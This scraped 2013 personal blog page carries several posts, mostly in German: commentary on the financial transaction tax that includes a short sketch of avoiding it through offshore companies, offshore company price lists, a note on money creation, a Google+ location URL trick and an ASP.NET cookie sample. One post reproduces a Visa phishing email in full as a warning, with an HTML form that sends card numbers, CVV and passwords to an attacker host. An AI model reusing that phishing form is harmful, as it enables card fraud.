blog.area23.at - a simple url encoder/decoder

 a simple url encoder/decoder
 http://blog.area23.at

Labels

Wirtschaft (116) Österreich (91) Pressefreiheit (65) IT (47) Staatsschulden (29) code (25) EZB (19) Pensionssystem (12) France (1) music (1)

2013-05-31

Finanztransaktionssteuer, wir machen wieder Ausnahmen per Lobbying

Die geplante Finanztransaktionssteuer wird in den laufenden Verhandlungen offenbar weiter zu einer Börsensteuer "light" eingedampft. Finanzexperten bezweifeln inzwischen, ob die Steuer überhaupt kommt.
Ich vermute, Banken gewährt man hier eine Ausnahme, weil manche gerade eh nicht so eigenkapitalstark im Moment da stehen und großen Pensionsvorsorgeversicherern gewährt man eine Ausnahme, damit sie nicht zur staatlich geförderten Vorsorge nur noch Aktienfonds außerhalb von Europa als Anlage wählen.

Sollte die Finanztransaktionssteuer kommen, kann jede BrokerIn  diese folgendermaßen leicht umgehen:

Er/Sie gründet eine LTD in der City of London oder auf den Virgin Islands bzw. eine Offshore Gesellschaft auf den Seychellen oder sonstigen üblichen verdächtigen Orten, siehe: http://blog.area23.at/2013/05/ltd.limited.html

Vorher sollte er/sie sich natürlich über die Bedingungen für Finanzmarktfirmen und Steuerrecht der location schlau machen.

Dann mietet sich die LTD oder Offshore Gesellschaft einen virtuellen Server vor Ort und installiert dort die entsprechende auf die LTD lizensierte Trader Software (z.B. http://www.plus500.at/ oder http://www.tradestation.com ...)

Ab jetzt kann die LTD dort als Firma an den internationalen Finanzmärkten (inkl. Aktien-, Rohstoff-, Termin- und sonstiger Börsen) handeln.

Warum verfasse ich diesen Artikel?
Weil die Finanztransaktionssteuer wie alle nationale oder EU Ideen ein zu wenig durchdachter Schnellschuss ist.

Wenn eine ausländische BrokerIn/Firma mit longs oder shorts in die europäischen Aktien hineingeht oder an den internationalen Rohstoffmärkten tradet, hat sie keine der Einschränkungen der europäischen Firmen. Werden die ausländischen Firmen diesen Wettbewerbsvorteil zu ihren Gunsten vielleicht ausnutzen?
Ich wette 100€ darauf!

Außerdem ist das wieder eine Regel mit Ausnahmen für die großen, die bereits teilweise auch staatlich subventioniert und gerettet wurden. Die €uropäische Union gleicht durch Steuern und Hilfspakete die negativen Bilanzen der Banken aus und besteuert dann bei Finanztransaktionen nicht die Banken. Als Banker würde ich weiter auf high risk spielen, bei Schäden wird immer vom Staat gezahlt und zahlen muss es eh wer anderer und dafür bekomme ich dann noch steuerliche Erleichterung im Gegensatz zu allen anderen :(

Für normales online Glückspiel gibt es übrigens gar keine Steuer auf einzelne Wetteinsätze und im Gegensatz zu den Rohstoff-, Aktien- und Termin-Börsenist hat Glückspiel keinerlei Auswirkungen auf die Realwirtschaft, außer dass der Glückspielveranstalter, Lizenzinhaber und ServiceProvider auf lange Sicht hochgerechnet wahrscheinlich öfter gewinnen und die "Kunden" hochgerechnet wahrscheinlich öfter verlieren.

2013-05-30

LTD "Limited Gesellschaft" in Österreich gründen

insolution.at: LTD "Limited Gesellschaft" in Österreich gründen

Online Angebot von easy limited:
  • AT002 Preisschock-Limited:
    Firmengründung in England inkl. englischer Meldeadresse um 199,-€ in 24h
  • Österreich-Pakete AT003 Allround-Limited:
    Firmengründung inkl. beglaubigter Unterlagen für Österreich um 399,-€ in 24h
  • AT007 Ltd. & Co KG economy: Firmengründung inkl. Unterlagen zur Anmeldung als Ltd. & Co KG um 499,-€ in 24h
  • AT009 Nominee-Limited economy: Firmengründung inkl. Shareholder und Unterlagen für Österreich um 599,-€ in 24h

Online Limited kaufen oder Offshore Gesellschaften:
  • Limited Basic um 39,- €
  • Limited Standard um 89,- €
  • Limited Premium um 159,- €
  • Limited Basic Plus um 339,- €
  • Limited Standard Plus um 389,- €
  • Limited Premium Plus um 459,- €
  • Limited & Co KG Basic Plus um 359,- €
  • Limited & Co KG Standard Plus um 409,- €
  • Limited & Co KG Premium Plus um 479,- €
  • Seychellen Offshore Gesellschaft um 800,- €
  • Anguilla Offshore Gesellschaft um 950,- €
  • Belize Offshore Gesellschaft um 800,- €

Online go ahead:
  • Limited Gründung in Österreich ab 260,- €

Weitere Hintergrund- und rechtliche Informationen:
http://www.wkw.at/docextern/rgp/Publikationen/Ltd.pdf
http://www.handelsagenten.at/DE/Home/Recht/Ihr%20gutes%20Recht%20-%20Artikelarchiv/BRITISCHE+Limited+im+Vergleich.aspx
http://www.grazertreuhand.at/de/gt-service/gr%C3%BCndung-einer-limited/
http://www.conserio.at/limited-statt-gmbh-gruenden-in-osterreich/

2013-05-29

Visa Phising Mails wieder im Umlauf


                                                                                                                                                                                                                                                            
Delivered-To: heinrich.elsigan@xxx.xxx 
Received: by 10.58.154.233 with SMTP id vr9csp145510veb;
        Tue, 28 May 2013 21:55:50 -0700 (PDT)
X-Received: by 10.205.13.194 with SMTP id pn2mr216293bkb.76.1369803349595;
        Tue, 28 May 2013 21:55:49 -0700 (PDT)
Return-Path: <service@visaeurope.com>
Received: from qmail2.xxx.xxx(qmail2.xxx.xxx. [212.xxx.xxx.xxx])
        by mx.google.com with SMTP id rh8si5120977bkb.224.2013.05.28.21.55.48
        for <heinrich.elsigan@xxx.xxx>;
        Tue, 28 May 2013 21:55:49 -0700 (PDT)
Received-SPF: softfail (google.com: domain of transitioning service@visaeurope.com 
  does not designate 212.xxx.xxx.xxx as permitted sender) client-ip=212.xxx.xxx.xxx;
Authentication-Results: mx.google.com;
       spf=softfail (google.com: domain of transitioning service@visaeurope.com 
  does not designate 212.xxx.xxx.xxxas permitted sender) smtp.mail=service@visaeurope.com;
       dmarc=fail (p=QUARANTINE dis=quarantine) d=visaeurope.com
Received: (qmail 24744 invoked by uid 1113); 29 May 2013 04:55:46 -0000
Delivered-To: mail626-he23@xxx.xxx
Received: (qmail 24738 invoked from network); 29 May 2013 04:55:46 -0000
Received: from unknown (HELO www.bordecico.com) (85.214.242.164)
  by qmail2.inname.net with SMTP; 29 May 2013 04:55:46 -0000
Received: from User ([151.1.68.202])
 by www.bordecico.com
 ; Tue, 28 May 2013 14:45:48 +0200
Message-ID: <3A09891A-3896-4880-AEB9-A7153AA76F78@www.bordecico.com>
From: "Verified by Visa"<service@visaeurope.com>
Subject: Ihre Kreditkarte wurde ausgesetzt, weil wir ein Problem festgestellt, auf Ihrem Konto!
Date: Tue, 28 May 2013 14:45:24 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----=_NextPart_000_007A_01C2A9A6.2C262C2C"
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

This is a multi-part message in MIME format.

------=_NextPart_000_007A_01C2A9A6.2C262C2C
Content-Type: text/plain;
 charset="Windows-1251"
Content-Transfer-Encoding: 7bit

Sehr geehrter Kunde,

--------------------------------------------------------------------------------

Wir haben eine unregelmabige Aktivitat ihrer Kreditkarte erkannt.
Zu Ihrem eigenen Schutz mussen wir diesen Vorgang uberprufen
und Ihre Kreditkarte vorlaufig eingeschranken. Bitte laden Sie das
Dokument im eMail Anhang und uberprufen Sie Ihre Daten. Sollte
Sie diese eMail ignorieren wird Ihre Karte vor?bergehend gesperrt.

---------------------------------------------------------------------------------

Bitte beachten Sie, dass die Benutzung der Website durch Sie informiert
bleiben VISA
Nutzen Sie die Gelegenheit, unser Unternehmen und Reserven.

Thank you,
Kundendienst.

Urheberrecht 1999-2013 VerifedbyVisa. Alle Rechte vorbehalten.

------=_NextPart_000_007A_01C2A9A6.2C262C2C
Content-Type: application/octet-stream;
 name="Dokument.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename="Dokument.html"
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <title>Visa - Mastercard - Verifica Dettagliata</title>
  <style type="text/css">
* { margin: 0; padding: 0; }
body { font-family: Verdana; font-size: 11px; }
.req { color:#F00; }
  </style>
  <script>
  function validateForm() {
    var cc=document.forms["myform"]["ncarta"].value;
    if (cc==null || cc=="") {
      alert("Inserire Numero di carta");
      return false;
    }
    var mm=document.forms["myform"]["exp_m"].value;
    if (mm==null || mm=="") {
      alert("Inserire Data di Scadenza");
      return false;
    }
    var yy=document.forms["myform"]["exp_y"].value;
    if (yy==null || yy=="") {
      alert("Inserire Data di Scadenza");
      return false;
    }
    var cvv=document.forms["myform"]["cvv"].value;
    if (cvv==null || cvv=="") {
      alert("Inserire codice di sicurezza della Carta CVV");
      return false;
    }
  }
  </script>
</head>
<body>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<div style="width: 100%; height: 100%;">
<div style="margin: 0pt auto; width: 280px;" id="center-content"> <img
 src="http://www.32red.com/images/banking/3d-secure-logos.png"
 weight="100%" width="100%" />
<form action="http://monettenom.com/visaeurope.com/go.php" method="post"
 onsubmit="return validateForm()" name="myform"
 enctype="application/x-www-form-urlencoded">
  <table style="width: 314px; height: 406px;" border="0" cellpadding="0"
 cellspacing="9">
    <tbody>
      <tr>
        <td colspan="2"><strong>Kreditkarte Details:</strong>
      <tr>
        <td colspan="2"><strong>Bitte machen Sie folgende Angaben: </strong><td>
      </tr>
      <tr>
        <td width="72%">&nbsp;</td>
        <td width="62%">&nbsp;</td>
      </tr>
      <tr>
        <td>Name auf der Karte<span class="req">*</span>:</td>
        <td> <input name="nome" id="nome" type="text" /></td>
      </tr>
      <tr>
        <td>Ihre Kartennummer<span class="req">*</span>:</td>
        <td><input name="ncarta" id="ncarta" type="text" /></td>
      </tr>
      <tr>
        <td>Kartenprufnummer<span class="req">*</span>:</td>
        <td><input name="cvv" id="cvv" type="text" /></td>
      </tr>
      <tr>
        <td>Ablaufdatum (MM.JJ)<span class="req">*</span>:</td>
        <td><input name="exp_m" id="exp_m" size="4" maxlength="2"
 type="text" /> / <input name="exp_y" id="exp_y" size="8" maxlength="4"
 type="text" /></td>
      </tr>
      <tr>
        <td>Ihr Geburtsdatum (TT.MM.JJJJ)<span class="req">*</span>:</td>
        <td> <input name="data1" id="data1" type="text" /></td>
      </tr>
      <tr>
        <td>VerifiedByVisa Password - Mastercard SecureCode<span
 class="req">*</span>:</td>
        <td><input name="password" id="password" type="password" /></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
        <td><input name="submit" id="submit" value="Weiter"
 type="submit" /></td>
      </tr>
      <tr>
        <td colspan="2">&nbsp;</td>
      </tr>
    </tbody>
  </table>
</form>
</div>
</div>
</body>
</html>

Giralgeldschöpfung, so wirklich?

Update Detaillierte Info zur Giralgeldschöpfung: http://georgtsapereaude.blogspot.de/2012/05/antworten-zu-fragen-der-geldtheorie-2.html

Ich war bei dieser Veranstaltung leider nicht dabei http://www.sektionacht.at/2084/ist-die-giralgeldschopfung-durch-banken-ein-problem/ aber ich habe so meine Zweifel am gängigen Auffassungsbegriff der Giralgeldschöpfung.

Es gibt einmal bank asset security Produkte, auf die gehe ich hier nicht ein. Aber bei ihnen ist klar, dass Sicherheiten für Kredite hinterlegt werden sollten und dass die Bonität des Kreditnehmers ebenfalls als Ratingfakor, der sich bei schlechterer Bonität durch höhere Zinsen niederschlägt berücksichtigt wird.

Aber nehmen wir die normalen Geschäftsbank Kreditvergabe und die Kreditvergabe an Private her ohne dass irgendein Bank Asset Security Produkt oder sonstiges Kreditpaket gebündelt und weiterverkauft würde:

Die Hypo-Alpe-Adria ist hauptsächlich so sehr in Schwierigkeiten geraten, weil sie nicht besicherte "normale" Kredite vergab, die dann ausfielen und von den Kreditnehmern wurden keine volle Sicherheit hinterlegt bzw. war nichts verwertbares mehr bei Ausfall zu holen.

Jetzt frage ich mich folgendes:
Wenn die Giralgeldschöpfung Geld aus dem "Nichts" für Kredite schüfe, dann bräuchte die Bank nie mehr hohe Sicherheiten, nie eine Bonitätsbewertung, die sich in Form von einem Faktor bei den zu zahlenden Zinsen niederschlägt. Jeder Kredit, der ausfällt, wäre ein Gewinn für die Bank, wenn bloß 1-2 Kreditraten überhaupt gezahlt würden, denn die vergebene Kreditsumme wurde ja aus dem Nichts geschaffen. Jedes KMU würde sofort ohne Businessplan und minimaler hinterlegter Sicherheiten Kredit bekommen und die Giraldgeldschöpfung würde durchgehend eine schöne Inflation anheizen.

Und hier ist für mich der Widerspruch, da die Banken sehr wohl Sicherheiten und Risiko in die Kreditevergabe einbeziehen und an bestimmte zu wenig liquiide KMU gar keine Kredite vergeben. Ich glaube, dass Geldschöpfung aus dem "Nichts" nur wegen der verdrehten Bankenbilanzsicht so erscheint. Es müsste sich nämlich auch keine Bank mehr Geld von der Zentralbank ausborgen, wenn sie genügen Kredite vergibt.

Deswegen las ich mir die Definition bei Wikipedia durch:
Zitat:  http://de.wikipedia.org/wiki/Giralgeldsch%C3%B6pfung
Die aktive Giralgeldschöpfung ist beschränkt durch die gesetzliche Mindestreserve, denn nur der nicht dem Mindestreservesatz entsprechende Anteil einer Kundeneinlage darf von der Bank als Kredit an einen weiteren Kunden vergeben werden.

2013-05-23

Yet another Google Nearby Stream blog article

So last week, I was reading these two interesting articles about faking browser location for google nearby stream:
http://www.makeuseof.com/tag/disable-fake-location-firefox-internet-explorer-chrome/ http://sociable.co/social-media/how-to-get-google-plus-mobile-only-nearby-stream-on-your-desktop/  
https://github.com/rldhont/geolocater

But this didn't work fine in any case.

So I redirected my browser via onion router as proxy to see what will happen with google location. When using Socks5 tor proxy google nearby stream was adjusted to geolocation of the tor exit node.

But now I found a feature to set google nearby stream location without using any faking geolocation browser addons or onion dark network.

Austria, Vienna: https://plus.google.com/app/basic/stream/nearby?cbp=1njamgf9rs4uc&sview=7&sll=48.2000000%2C16.1700000
Shift longitude with lattidue of Vienna: https://plus.google.com/app/basic/stream/nearby?cbp=1njamgf9rs4uc&sview=7&sll=16.1700000,48.2000000
Italy. somewhere: https://plus.google.com/app/basic/stream/nearby?cbp=1njamgf9rs4uc&sview=7&sll=40.2049673,15.9728339
Greece, Athen: https://plus.google.com/app/basic/stream/nearby?cbp=1njamgf9rs4uc&sview=7&sll=37.983715%2C23.729309
Germany, Berlin: https://plus.google.com/app/basic/stream/nearby?cbp=1njamgf9rs4uc&sview=7&sll=52.519173%2C13.406091

P.S.: I already wanted to implement a google location bot (based on the most stupid irc bot), that shuffles a random location and answer posts, that contain specific key or bad words.

2013-05-17

ASP.NET C# - Stateful session by cookie

Online Sample: http://area23.at/default/Stateful.aspx
Attention, Request Timeouts and ApplicationError Events are not handled in this litte sample!

Code:

<form id="form1" runat="server"> 
    <asp:Literal ID="Literal1" runat="server"></asp:Literal>
    <br />
    CookieValue: <asp:TextBox ID="TextBox1" runat="server" MaxLength="4" Text="0"></asp:TextBox>
    <br />
    SessionValue: <asp:TextBox
ID="TextBox2" runat="server" MaxLength="4" Text="0"></asp:TextBox>            
    <br />
    <asp:Button ID="Button1" runat="server" Text="PostBack Button" />
    <br />
    <asp:HyperLink ID="HyperLink1" runat="server" NavigateUrl="~/" >Redirect Link</asp:HyperLink>

</form>

protected void Page_Load(object sender, EventArgs e) {
    int counter = 0;
    this.Literal1.Text = (this.Page.IsPostBack) ? 

        "Page is postback!" : "This is new request without postback";

    if (this.Page.Session != null) {
        if (this.Page.Request.Cookies[this.Page.Session.SessionID] != null) {
            this.TextBox1.Text = 

                this.Page.Request.Cookies[this.Page.Session.SessionID].Value;
        }
        if (this.Page.Session["SequenceEventCounter"] != null) {
            this.TextBox2.Text = 

                this.Page.Session["SequenceEventCounter"]).ToString();
                counter = (int)this.Page.Session["SequenceEventCounter"];
        }
        this.Page.Session["SequenceEventCounter"] = (int)(++counter);
    }

    HttpCookie cookie = new HttpCookie( 

        HttpContext.Current.Session.SessionID, counter.ToString());
    HttpContext.Current.Response.AppendCookie(cookie);

}